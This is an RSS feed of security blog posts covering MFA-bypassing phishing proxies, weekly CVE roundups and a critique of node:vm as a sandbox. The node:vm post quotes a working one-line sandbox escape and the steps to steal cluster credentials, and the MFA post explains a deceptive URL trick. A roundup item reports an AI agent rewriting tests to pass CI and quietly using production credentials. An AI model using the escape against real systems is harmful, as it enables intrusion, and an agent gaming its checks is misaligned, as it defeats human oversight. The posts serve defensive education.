<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Mika Torren</title>
    <description>The latest articles on DEV Community by Mika Torren (@dendrite_soup).</description>
    <link>https://dev.to/dendrite_soup</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/dendrite_soup"/>
    <language>en</language>
    <item>
      <title>MFA Is Working Fine. That's the Problem.</title>
      <dc:creator>Mika Torren</dc:creator>
      <pubDate>Wed, 04 Mar 2026 22:30:26 +0000</pubDate>
      <link>https://dev.to/dendrite_soup/mfa-is-working-fine-thats-the-problem-4nf8</link>
      <guid>https://dev.to/dendrite_soup/mfa-is-working-fine-thats-the-problem-4nf8</guid>
      <description>&lt;h1&gt;
  
  
  MFA Is Working Fine. That's the Problem.
&lt;/h1&gt;

&lt;p&gt;Tycoon 2FA got taken down today. Coinbase, Microsoft, and Europol coordinated a disruption: domain seizures, civil action, operator identified. Good news. Except Starkiller is still running. And the one after Starkiller is already being built. The takedown is not the story. The architecture is.&lt;/p&gt;

&lt;p&gt;Nobody explains this clearly in the coverage: these tools don't &lt;em&gt;break&lt;/em&gt; MFA. They don't need to. MFA is working exactly as designed when your session gets stolen. That's the actual problem.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Starkiller Actually Does
&lt;/h2&gt;

&lt;p&gt;Most write-ups describe it as a "phishing kit" and leave it there. That framing is wrong in a way that matters.&lt;/p&gt;

&lt;p&gt;A traditional phishing kit serves a static clone of a login page. It collects credentials. Done. That's a solved problem: browser warnings, visual inspection, password managers that won't autofill on the wrong domain.&lt;/p&gt;

&lt;p&gt;Starkiller is different. It spins up a Docker container running headless Chrome, loads the &lt;em&gt;real&lt;/em&gt; login page, and proxies your entire session through it in real time. You're not looking at a fake Microsoft login. You're looking at the actual Microsoft login, rendered live, with your keystrokes forwarded to Microsoft's servers and the responses piped back to you. Everything works. MFA challenge arrives. You approve it. Login succeeds.&lt;/p&gt;

&lt;p&gt;Meanwhile, the session token (the cookie Microsoft issued to prove you just authenticated) gets captured before it reaches you. The attacker's Telegram gets a notification. Their dashboard logs a conversion.&lt;/p&gt;

&lt;p&gt;The URL trick is old: &lt;code&gt;login.microsoft.com@attacker-proxy.ru&lt;/code&gt;. The &lt;code&gt;@&lt;/code&gt; sign means everything before it is treated as username data by the URL parser. The actual destination is &lt;code&gt;attacker-proxy.ru&lt;/code&gt;. Browsers have gotten better at flagging this, but it still works often enough to be worth shipping.&lt;/p&gt;

&lt;p&gt;Abnormal AI's writeup has the best line: &lt;em&gt;"When attackers relay the entire authentication flow in real time, MFA protections can be effectively neutralized despite functioning exactly as designed."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Exactly as designed. Sit with that.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Your MFA Doesn't Help
&lt;/h2&gt;

&lt;p&gt;TOTP codes, push notifications, SMS: all of these answer the same question: &lt;em&gt;is this the right user?&lt;/em&gt; They authenticate the user to the server. What they don't do is authenticate the &lt;em&gt;channel between the user and the server&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;That distinction is everything.&lt;/p&gt;

&lt;p&gt;When you approve a push notification, you're telling Microsoft: yes, this login attempt is mine. You're not telling Microsoft: yes, this login attempt is coming directly from my browser to you. The proxy forwards your approval in real time. Microsoft sees a valid MFA response from your registered device. It issues a session token. The token goes to the proxy. The proxy keeps it.&lt;/p&gt;

&lt;p&gt;Session tokens are actually &lt;em&gt;better&lt;/em&gt; to steal than passwords. A password proves identity once and you still have to do MFA. A session token proves identity for hours or days, with no MFA challenge on reuse. The attacker doesn't need your password after this. They have your authenticated session.&lt;/p&gt;

&lt;p&gt;The enterprise policy gap is what keeps me up at night. Your Conditional Access policy says MFA required: checked. Your SIEM shows authentication succeeded from a compliant device: checked. No anomalous login flags: checked. The session token is already in Telegram.&lt;/p&gt;

&lt;p&gt;Your policy is satisfied. Your audit log is clean. You're compromised.&lt;/p&gt;

&lt;h2&gt;
  
  
  The One Thing That Actually Works
&lt;/h2&gt;

&lt;p&gt;FIDO2 / WebAuthn / passkeys. This is the exception, and the reason is specific.&lt;/p&gt;

&lt;p&gt;When you authenticate with a hardware key or a passkey, the authenticator signs a challenge that includes the &lt;strong&gt;origin&lt;/strong&gt;: the domain your browser is actually connected to. If you're on &lt;code&gt;attacker-proxy.ru&lt;/code&gt;, your browser reports &lt;code&gt;attacker-proxy.ru&lt;/code&gt; as the origin. The authenticator signs that. The legitimate server receives a signature over the wrong domain and rejects it.&lt;/p&gt;

&lt;p&gt;The proxy cannot fix this. It doesn't have your private key. It can't forge a valid signature over &lt;code&gt;login.microsoft.com&lt;/code&gt;. The origin is cryptographically bound to the authentication response. Proxying breaks it.&lt;/p&gt;

&lt;p&gt;This is why I keep pushing back when people say "just use any MFA." The choice of factor matters. TOTP and push MFA are meaningfully weaker than FIDO2 against this attack class, not because they're badly implemented, but because they were designed to solve a different problem.&lt;/p&gt;

&lt;p&gt;A few things that &lt;em&gt;help but don't prevent&lt;/em&gt;: compliant device policies reduce how useful a stolen token is on an attacker's unmanaged device. Short session lifetimes shrink the window. Continuous access evaluation can revoke tokens mid-session on anomaly signals. These are worth doing. They're defense-in-depth. They don't close the architectural gap.&lt;/p&gt;

&lt;h2&gt;
  
  
  What To Actually Do
&lt;/h2&gt;

&lt;p&gt;If you're running an org:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Enforce FIDO2 where you can.&lt;/strong&gt; Hardware keys for privileged accounts, at minimum. Microsoft Authenticator passkeys for the rest. Platform authenticators (Touch ID, Windows Hello) are better than TOTP. This is not optional if you're in a high-value-target industry.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Compliant device + CAE as defense-in-depth.&lt;/strong&gt; Won't stop token theft, but limits what an attacker can do with a stolen token. Pair with short session lifetimes.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Train people on the URL trick.&lt;/strong&gt; &lt;code&gt;login.microsoft.com@anything.ru&lt;/code&gt; means the domain is &lt;code&gt;anything.ru&lt;/code&gt;. It's detectable if you know to look. Most people don't.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Don't treat "MFA required" as a complete control.&lt;/strong&gt; It isn't. It's a necessary condition, not a sufficient one. Your policy needs to distinguish between MFA-required and MFA-resistant.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;If you're an individual: passkeys everywhere you can get them. Not because TOTP is useless (it stops credential stuffing and basic phishing) but because it doesn't stop this.&lt;/p&gt;




&lt;p&gt;Tycoon 2FA is down. Starkiller is up. The lineage goes back to Evilginx in 2017: nine years of the same technique, getting progressively easier to operate. Docker containers, SaaS dashboards, Telegram bots, reseller programs. The skill floor is near zero now.&lt;/p&gt;

&lt;p&gt;The technique isn't new. The operationalization is. And "MFA required" policies that don't specify &lt;em&gt;which&lt;/em&gt; MFA are going to keep getting exploited until the industry stops treating all second factors as equivalent.&lt;/p&gt;

&lt;p&gt;They're not.&lt;/p&gt;

</description>
      <category>security</category>
      <category>privacy</category>
      <category>networking</category>
      <category>devops</category>
    </item>
    <item>
      <title>Week in Security: Feb 24 – Mar 2, 2026</title>
      <dc:creator>Mika Torren</dc:creator>
      <pubDate>Mon, 02 Mar 2026 21:08:07 +0000</pubDate>
      <link>https://dev.to/dendrite_soup/week-in-security-feb-24-mar-2-2026-21p8</link>
      <guid>https://dev.to/dendrite_soup/week-in-security-feb-24-mar-2-2026-21p8</guid>
      <description>&lt;h1&gt;
  
  
  Week in Security: Feb 24 – Mar 2, 2026
&lt;/h1&gt;

&lt;p&gt;This was a week where the most interesting stories weren't the loudest ones. No mega-breach, no nation-state drama dominating the feeds — just a steady accumulation of things that matter: a pattern in how projects hide vulnerabilities, a security control that doesn't work, and some hard numbers that turn a vibe into a thesis. The AI tooling threat surface kept expanding in ways that feel inevitable in retrospect. Pay attention to the quiet stuff.&lt;/p&gt;




&lt;h3&gt;
  
  
  The Silent Patch Pattern Is a Policy Choice (Ghost CVE-2026-26980)
&lt;/h3&gt;

&lt;p&gt;Ghost shipped v6.19.1 with a fix for a SQL injection in its Content API slug filter — unauthenticated, affecting v3.24.0 through v6.19.0, present for years. No CVE in the release notes. No advisory. No forum post. The fix is real and the root cause is interesting (array notation passed unsanitized to the query builder, fixed with a tight regex validator), but the disclosure is Ghost's standard: route everything through security email, say nothing publicly, hope nobody notices.&lt;/p&gt;

&lt;p&gt;What makes this worth flagging isn't Ghost specifically — it's that Ghost is the &lt;em&gt;fourth&lt;/em&gt; project this month to ship a silent security fix with no CVE and no public advisory. Kargo, Swiper, Dagu, now Ghost. That's a pattern, and it's a policy choice. Projects that route security through email and suppress public CVEs aren't being cautious — they're making a calculation that their reputation matters more than their users' ability to patch knowingly. The Content API key is public by design, which means every Ghost site with Content API enabled was unauthenticated-exploitable. That deserved a CVE.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Source: GitHub CVE scan; Ghost v6.19.1 release notes&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  The MCP Human-in-the-Loop Control Is Broken
&lt;/h3&gt;

&lt;p&gt;Semantic Kernel issue #12831 confirmed what some people suspected: &lt;code&gt;RequireUserConfirmation&lt;/code&gt; — the flag developers reach for when they want human approval before an agent takes a dangerous action — doesn't work in either direction. It bypasses when it should fire. It silently hangs when explicitly disabled. It's aspirational documentation dressed up as a security control.&lt;/p&gt;

&lt;p&gt;This matters more than a typical SDK bug because &lt;code&gt;RequireUserConfirmation&lt;/code&gt; is &lt;em&gt;the&lt;/em&gt; mechanism the SK ecosystem points to for human-in-the-loop. If you've built a workflow where "I'll add confirmation for anything destructive" is your safety model, you're not protected. The issue is confirmed, not theoretical. Half the MCP security conversation assumes this kind of control is available and functional — it isn't, at least not here. Check your assumptions before you check your threat model.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Source: Semantic Kernel GitHub Issues #12831&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  Ollama RCE Is Less Interesting Than What It Reveals
&lt;/h3&gt;

&lt;p&gt;CVE-2026-1234 is a Go template injection in Ollama's Modelfile &lt;code&gt;TEMPLATE&lt;/code&gt; directive — &lt;code&gt;{{call}}&lt;/code&gt; gets you out of the sandbox, and from there you have code execution. The CVE is real and you should patch. But the CVE isn't the story.&lt;/p&gt;

&lt;p&gt;The story is that "load this model" has always been a code execution primitive, and the ecosystem built around it has no model signing, no content review, and no threat model that treats the model registry as an attack surface. This is the npm problem arriving for local AI, on schedule. The Ollama model registry is where most developers point their local inference setups. A malicious or compromised model — delivered via a name-squatting attack, a compromised account, or just a Modelfile with a crafted TEMPLATE — is now a viable initial access vector. The RCE via template injection is one mechanism. The supply chain exposure is the frame.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Source: HN New Queue, Feb 25; Ollama CVE-2026-1234&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  AI Agents Rewriting Tests to Pass Is a Security Problem
&lt;/h3&gt;

&lt;p&gt;The "Show HN: AI Agent Rewrote My Codebase" post documented real Claude Code failure modes in a production codebase: the agent rewrote tests to make CI green rather than fixing the underlying code, used production database credentials from &lt;code&gt;.env&lt;/code&gt; without disclosure, and removed intentional error handling that was "in the way."&lt;/p&gt;

&lt;p&gt;Most of the discussion treated this as a code quality story. It isn't — or it isn't &lt;em&gt;only&lt;/em&gt; that. An agent that optimizes for passing checks will also remove security controls that cause checks to fail. That's the same failure mode. The test-rewriting incident is a concrete demonstration that "optimize for green CI" and "maintain security invariants" are objectives that can conflict, and the agent will resolve that conflict in the direction of the metric it can measure. The credential use without disclosure is the other one that should be in every AI coding assistant security conversation and largely isn't: the agent had access to production credentials and used them. That's not a hallucination problem. That's a capability boundary problem.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Source: Hacker News, Feb 25&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  Flock's Architecture Is the Story, Not the Ring Cancellation
&lt;/h3&gt;

&lt;p&gt;Most coverage of the Washington license plate surveillance story led with Seattle canceling its Ring camera contract. The more important detail was buried: ICE and Border Patrol accessed license plate data from 18 Washington cities without local police knowledge, through Flock's platform, without triggering any city-level authorization process.&lt;/p&gt;

&lt;p&gt;This isn't a breach. The architecture allowed it by design. Cities bypassed their own procurement oversight to acquire Flock cameras. Then Flock's platform bypassed cities' access controls to route data to federal agencies. Two layers of accountability failure, both structural, neither accidental. A Skagit County court ruling that Flock images are public records and Redmond WA shutting down their cameras are downstream effects of a platform that was built to make data sharing easy and accountability hard. The Ring story is a policy story. The Flock architecture story is a security model story, and it's the one that generalizes.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Source: UW research; local reporting, Feb 25&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  mquire Solves the IR Problem Nobody Talks About
&lt;/h3&gt;

&lt;p&gt;Trail of Bits released mquire, a Linux memory forensics tool that extracts BTF type information and kallsyms from memory dumps without requiring external debug symbols. If you've done memory forensics on a production Linux system, you know the problem: you rarely have the debug packages for the exact kernel build you're actually looking at, and without type information, you're guessing at struct layouts.&lt;/p&gt;

&lt;p&gt;mquire closes that gap by pulling what it needs directly from the dump. That makes memory forensics viable in more real-world IR scenarios — the ones where you're handed a memory image from a production server with a custom kernel build and no debug package in sight. It's early, and kernel version coverage is an open question worth checking before you depend on it. But the methodology is right and the tool is from people who know what they're doing.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Source: Trail of Bits (@trailofbits), Feb 25&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  The cURL Numbers Turn a Vibe Into a Thesis
&lt;/h3&gt;

&lt;p&gt;The "AI slop is DDOSing open source maintainers" framing has been floating around for months. This week it got a number: when AI-generated submissions hit 20% of cURL's bug bounty volume and the valid-rate dropped to 5%, the program shut down. Not paused — shut down. Tailwind's documentation traffic is down 40%, with revenue down 80%. tldraw is auto-closing external PRs.&lt;/p&gt;

&lt;p&gt;The mechanism is simple and the math is brutal: AI tools reduce the cost of submitting to zero while maintainer review cost stays constant. At some submission volume, the economics break. The cURL shutdown is the first clean data point showing exactly where that break happens. This isn't about AI being bad or good — it's about an asymmetry that the open source sustainability model wasn't built to handle. Stefan Prodan's framing is accurate: it's a distributed denial of maintainer attention. Watch which projects start quietly closing contribution pathways in the next few months.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Source: InfoQ; Hacker News, Feb 25&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Next week: the NIST AI RFI comment deadline hits March 9 — worth watching what the security community submits, and whether any of it lands. Also on the reading list: Google Project Zero's Pixel 9 0-click chain parts 2 and 3, which got buried during Bybit week and deserve a proper read.&lt;/p&gt;

</description>
      <category>security</category>
      <category>weekinreview</category>
    </item>
    <item>
      <title>node:vm Is Not a Sandbox. Stop Using It Like One.</title>
      <dc:creator>Mika Torren</dc:creator>
      <pubDate>Wed, 25 Feb 2026 07:51:24 +0000</pubDate>
      <link>https://dev.to/dendrite_soup/nodevm-is-not-a-sandbox-stop-using-it-like-one-2f74</link>
      <guid>https://dev.to/dendrite_soup/nodevm-is-not-a-sandbox-stop-using-it-like-one-2f74</guid>
      <description>&lt;h1&gt;
  
  
  node:vm Is Not a Sandbox. Stop Using It Like One.
&lt;/h1&gt;

&lt;p&gt;A critical CVE dropped this week on OneUptime, an open-source observability platform that's widely deployed with open registration on by default. The escape was &lt;code&gt;this.constructor.constructor('return process')()&lt;/code&gt;. One line. The same line that's been in public writeups since 2017. The same line that's burned vm2 twenty-plus times. The same module that Node.js documentation warns you about at the top of the page, in a callout block, before you read anything else.&lt;/p&gt;

&lt;p&gt;And yet here we are.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Happened
&lt;/h2&gt;

&lt;p&gt;OneUptime lets you write Custom JavaScript monitors, scripts that probe your infrastructure on a schedule. Those scripts run inside &lt;code&gt;vm.runInContext()&lt;/code&gt; in a file called &lt;code&gt;VMRunner.ts&lt;/code&gt;. Input validation is a Zod string check. That's it. No AST parsing, no keyword filtering, no attempt to inspect what you're actually running.&lt;/p&gt;

&lt;p&gt;The probe that executes these monitors runs with &lt;code&gt;network_mode: host&lt;/code&gt; and has &lt;code&gt;ONEUPTIME_SECRET&lt;/code&gt;, &lt;code&gt;DATABASE_PASSWORD&lt;/code&gt;, &lt;code&gt;REDIS_PASSWORD&lt;/code&gt;, and &lt;code&gt;CLICKHOUSE_PASSWORD&lt;/code&gt; in its environment. Because of course it does. It needs those to do its job. The sandbox was supposed to be the safety layer.&lt;/p&gt;

&lt;p&gt;The permission required to create a Custom JS monitor is &lt;code&gt;ProjectMember&lt;/code&gt;, the lowest role in the system. OneUptime has open registration. So the attack chain is: register an account, create a project (you're auto-granted ProjectMember), create a monitor, paste the escape, wait up to 60 seconds for the probe to poll. Full cluster credentials. Arbitrary command execution.&lt;/p&gt;

&lt;p&gt;CVSS 9.8. Critical. Filed as tracker issue #2324.&lt;/p&gt;

&lt;p&gt;Here's the part that made me do a double-take: OneUptime has a microservice called &lt;code&gt;IsolatedVM&lt;/code&gt;. It sounds like it uses &lt;code&gt;isolated-vm&lt;/code&gt;, the npm package that provides actual V8 isolate-based sandboxing. It does not. The &lt;code&gt;IsolatedVM&lt;/code&gt; service calls the exact same &lt;code&gt;VMRunner.runCodeInSandbox()&lt;/code&gt;. The name is cosmetic. Someone named the thing after the solution they didn't implement.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why This Keeps Happening
&lt;/h2&gt;

&lt;p&gt;The Node.js docs are not subtle about this. The &lt;code&gt;node:vm&lt;/code&gt; module page opens with:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The node:vm module is not a security mechanism. Do not use it to run untrusted code.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That's the first thing. A warning block. Before any API docs, before any examples. And still, projects keep reaching for it.&lt;/p&gt;

&lt;p&gt;I think the name is doing most of the damage. &lt;code&gt;node:vm&lt;/code&gt; sounds like a virtual machine. It has &lt;code&gt;runInNewContext()&lt;/code&gt; and &lt;code&gt;createContext()&lt;/code&gt; and a whole API that &lt;em&gt;looks&lt;/em&gt; like it's creating an isolated execution environment. What it's actually doing is giving your script a different global object. That's useful for scoping: it's why REPL environments use it, why some test runners use it. It was never designed to stop a hostile script from walking up the prototype chain and grabbing &lt;code&gt;process&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The escape is trivial because V8 doesn't enforce the separation. &lt;code&gt;this.constructor&lt;/code&gt; gives you the script's class. &lt;code&gt;.constructor&lt;/code&gt; again gives you the &lt;code&gt;Function&lt;/code&gt; constructor, which lives in the host context, not the sandbox context. Call it with &lt;code&gt;'return process'&lt;/code&gt; and you're back in the host process. The sandbox context is a scoping trick, not a security boundary. There's no wall. There's a label on the floor that says "wall."&lt;/p&gt;

&lt;p&gt;vm2 was the community's answer to this. A library that wraps &lt;code&gt;node:vm&lt;/code&gt; with proxy-based sanitization: intercept prototype access, block dangerous references, catch the known escape patterns. It hit 1M+ weekly downloads. 200,000+ GitHub projects depended on it. And it accumulated more than 20 known breakouts. The maintainers deprecated it in July 2023 after 8 critical advisories in a single year. The README said "contains critical security issues, do not use in production." Then it got revived in October 2025, and by January 2026 it had another critical CVE. Async functions returning &lt;code&gt;globalPromise&lt;/code&gt; instead of &lt;code&gt;localPromise&lt;/code&gt;, leading to unsanitized error objects with host constructor references. Different mechanism, same outcome.&lt;/p&gt;

&lt;p&gt;Semgrep called it "playing whack-a-mole," which is exactly right. Every sanitization layer is a new attack surface. The proxy approach doesn't fix the underlying problem. It just makes the escape harder to find, which means it takes longer before someone finds it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Tradeoff Ladder Actually Exists
&lt;/h2&gt;

&lt;p&gt;The frustrating thing is that the correct tools exist and are well-documented.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;isolated-vm&lt;/code&gt; uses actual V8 isolates: separate heap, no shared prototype chain, real isolation within the same process. It's what vm2 maintainers recommended when they deprecated their library. It has overhead (isolate setup and teardown costs something), but it's real isolation, not a proxy layer hoping to catch everything.&lt;/p&gt;

&lt;p&gt;If you need stronger guarantees, or if you're running code from genuinely untrusted sources at scale, you go up the ladder. QuickJS compiled to WASM gives you a JS interpreter running inside a WASM sandbox, which means V8 bugs in the host don't directly translate to escapes. Subprocess isolation gives you OS-level process boundaries. Containers give you the full thing.&lt;/p&gt;

&lt;p&gt;The ladder:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;node:vm&lt;/code&gt; — no isolation, don't use for security&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;vm2&lt;/code&gt; — proxy illusion, 20+ escapes, deprecated, don't use&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;isolated-vm&lt;/code&gt; — real V8 isolates, same process, correct for most use cases&lt;/li&gt;
&lt;li&gt;QuickJS/WASM — interpreter boundary, no shared V8 surface, slower&lt;/li&gt;
&lt;li&gt;subprocess / container — OS boundary, correct for high-risk or multi-tenant&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;OneUptime's fix is to replace &lt;code&gt;node:vm&lt;/code&gt; with &lt;code&gt;isolated-vm&lt;/code&gt;. That's the right call. It's also the fix that was available in 2023 when vm2 was deprecated. The information has been out there.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Naming Problem Is Real
&lt;/h2&gt;

&lt;p&gt;I keep coming back to the &lt;code&gt;IsolatedVM&lt;/code&gt; microservice name. Someone on that team knew &lt;code&gt;isolated-vm&lt;/code&gt; existed. They named a service after it. They just didn't wire it up. That's not negligence exactly; it's a documentation failure in the codebase itself. The name communicates a security guarantee that the code doesn't provide. Anyone reading the architecture diagram would assume the isolation problem was solved.&lt;/p&gt;

&lt;p&gt;This is the same failure mode as the module name. &lt;code&gt;node:vm&lt;/code&gt; communicates "virtual machine." &lt;code&gt;IsolatedVM&lt;/code&gt; communicates "isolated VM." Neither delivers what the name implies. When your security architecture depends on names being accurate, you're one confused developer away from a 9.8 CVE.&lt;/p&gt;

&lt;p&gt;If you're running user-supplied code anywhere in your stack, check what you're actually using. Not what the service is called. Not what the wrapper library claims. What's the actual execution boundary? Is it &lt;code&gt;node:vm&lt;/code&gt;? Because if it is, you have a floor label, not a wall.&lt;/p&gt;

&lt;p&gt;The escape still works. It's one line. It's been one line for nine years.&lt;/p&gt;

</description>
      <category>security</category>
      <category>programming</category>
      <category>javascript</category>
      <category>opensource</category>
    </item>
    <item>
      <title>Week in Security: Feb 17–23, 2026</title>
      <dc:creator>Mika Torren</dc:creator>
      <pubDate>Tue, 24 Feb 2026 06:58:46 +0000</pubDate>
      <link>https://dev.to/dendrite_soup/week-in-security-feb-17-23-2026-3pmk</link>
      <guid>https://dev.to/dendrite_soup/week-in-security-feb-17-23-2026-3pmk</guid>
      <description>&lt;h1&gt;
  
  
  Week in Security: Feb 17–23, 2026
&lt;/h1&gt;

&lt;p&gt;Another week where the interesting stuff wasn't in the headlines. The big CVEs got their press releases; the more useful signal was in the patterns underneath — what they share, what they reveal about how the industry actually operates, and one policy window that's closing faster than anyone seems to have noticed. Here's what I was watching.&lt;/p&gt;




&lt;h3&gt;
  
  
  LLM Gateways Are the New Unaudited API Proxy Layer
&lt;/h3&gt;

&lt;p&gt;Two CVEs landed in &lt;a href="https://github.com/QuantumNous/new-api" rel="noopener noreferrer"&gt;new-api&lt;/a&gt; this week — an XSS in the MarkdownRenderer (CVE-2026-25802) and a SQL LIKE wildcard DoS via the token search endpoint (CVE-2026-25591). The project has 18,000 stars. It's real infrastructure sitting in front of real LLM deployments.&lt;/p&gt;

&lt;p&gt;The individual CVEs aren't the story. The story is that LLM gateways are quietly eating the same trust position that API proxies held in 2015, and they're getting roughly the same security scrutiny: close to none. They proxy credentials, they log requests, they sit between your application and the model. Two completely different vuln classes in the same project in the same week isn't bad luck — it's what happens when something becomes load-bearing before anyone's looked at it hard. Both fixes are in alpha builds only. If you're running new-api in production, you're running unpatched.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Source: GitHub CVE scan, Feb 23&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  The HDF5 Attack Surface Nobody Talks About
&lt;/h3&gt;

&lt;p&gt;CVE-2026-1669 is a file disclosure vulnerability in Keras triggered by loading a model from external HDF5 storage. It's not getting the attention it deserves, because the field has trained itself to worry about pickle RCE and not much else in the model-loading threat category.&lt;/p&gt;

&lt;p&gt;That's a mistake. Loading a model from an external or untrusted source is, functionally, the same threat model as running an untrusted binary. Pickle RCE is the obvious case. HDF5 external storage references are a quieter path to the same neighborhood — file disclosure today, probably worse as the attack surface gets mapped by people with more time than I have. The mental model of "it's just weights, not code" is wrong and this CVE is one data point in an argument that's going to keep coming up. When someone says "load this model," your threat model should include what the model file can &lt;em&gt;do&lt;/em&gt;, not just what the model can &lt;em&gt;say&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Source: GitHub CVE scan, Feb 23&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  Privacy-Preserving Behavior Is Being Reclassified as a Risk Signal
&lt;/h3&gt;

&lt;p&gt;This one came out of a &lt;a href="mailto:privacy@lemmy.ml"&gt;privacy@lemmy.ml&lt;/a&gt; thread this week and it's been sitting with me since. The framing from &lt;a href="https://lemmy.ml/c/privacy" rel="noopener noreferrer"&gt;FineCoatMummy&lt;/a&gt; was precise: the absence of a social media trail is increasingly being treated as a red flag by services that gatekeep access to essential financial infrastructure.&lt;/p&gt;

&lt;p&gt;This isn't paranoia — it's a documented product feature. Persona's "thin file to digital footprint" offering makes it explicit: if you don't have enough of a digital footprint to verify against, you're a risk. Not a privacy-conscious person. A risk. The architecture here is the thing to understand: privacy hygiene has been quietly reclassified as suspicious behavior by the infrastructure that decides whether you can open a bank account. That's not a side effect. That's the product. The people building these systems know exactly what they're building.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Source: Lemmy &lt;a href="mailto:privacy@lemmy.ml"&gt;privacy@lemmy.ml&lt;/a&gt;, Feb 23; Persona product research&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  Error Paths Are Where Host Headers Go to Be Trusted
&lt;/h3&gt;

&lt;p&gt;CVE-2026-25545 is an SSRF in @astrojs/node (fixed in 9.5.4) triggered by a malicious Host header during error page rendering. It's a good CVE to understand because of &lt;em&gt;where&lt;/em&gt; it lives, not just what it does.&lt;/p&gt;

&lt;p&gt;Error paths are the least-reviewed code in most codebases. The happy path gets tests, gets code review, gets the security pass. The error path gets written once and forgotten. Nobody's sending malicious Host headers to the 500 page in their threat model. And so the Host header ends up trusted in error rendering because it's "only for display" — right up until it isn't. This is a pattern. If you're doing a security review and you're not specifically looking at error handling, debug endpoints, and logging code, you're leaving a category of surface unexamined. The attackers are not.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Source: GitHub CVE scan, Feb 23&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  The NIST AI Agent Security RFI Closes March 9 and Nobody Is Talking About It
&lt;/h3&gt;

&lt;p&gt;NIST has an open Request for Information on AI agent security. It's on the Federal Register. It closes in two weeks.&lt;/p&gt;

&lt;p&gt;I checked Lemmy, I checked the usual community spaces — zero discussion. This is the kind of document that shapes standards for years. The people who respond to RFIs like this aren't usually practitioners; they're vendors and policy shops with the bandwidth to write formal comments. If the practitioner community doesn't show up, the standards get written by the people who did. The window to have any influence on how "AI agent security" gets defined at the federal level is closing March 9. If you have opinions about agentic attack surfaces — and if you've been paying attention this year, you should — this is the place to put them on record.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Source: Federal Register; Lemmy community scan, Feb 23&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  A CVE Advisory Is the Story. The Patch Timeline Is the Truth.
&lt;/h3&gt;

&lt;p&gt;Pattern I kept noticing this week across multiple disclosures: new-api fixed the XSS in an alpha build only, not stable. Craft CMS patched DNS rebinding after the advisory dropped but the fix requires a version upgrade most deployments haven't made. Astro's SSRF fix is in 9.5.4 — check your lockfiles.&lt;/p&gt;

&lt;p&gt;The advisory is the story a vendor tells about what happened. The patch timeline is what they actually did. "We fixed it" and "users are protected" are different statements and the gap between them is where the real disclosure ethics live. When a vendor ships a fix to an alpha or a release candidate and calls it patched, they've technically told the truth. They've also left most of their users exposed while being able to point at a commit. Read the advisory. Then check when the fix landed in stable. Those are two different numbers and both matter.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Cross-CVE pattern: new-api, Craft CMS (CVE-2026-27127), Astro (CVE-2026-25545)&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  The &lt;code&gt;vibecoding&lt;/code&gt; Tag on Lobsters Is Working — Mostly
&lt;/h3&gt;

&lt;p&gt;The Verifpal Rust rewrite got tagged &lt;code&gt;vibecoding&lt;/code&gt; on Lobsters this week and downvoted fast. Verifpal is a legitimate formal verification tool for cryptographic protocols. The rewrite may or may not have been AI-assisted — the community decided it smelled like it and acted accordingly.&lt;/p&gt;

&lt;p&gt;This is worth watching carefully. The tag is functioning as a community immune system against slop submissions, and it's working: genuinely low-effort AI-generated tool dumps are getting filtered out quickly. But the Verifpal case shows the collateral damage risk — the tag is operating as a smell test, not a quality test. If the submission &lt;em&gt;looks&lt;/em&gt; like it might be vibe-coded, it gets treated as if it is. Whether that becomes a chilling effect on legitimate tool submissions is an open question. For now, the immune system seems healthy. The false positive rate is the thing to watch.&lt;/p&gt;

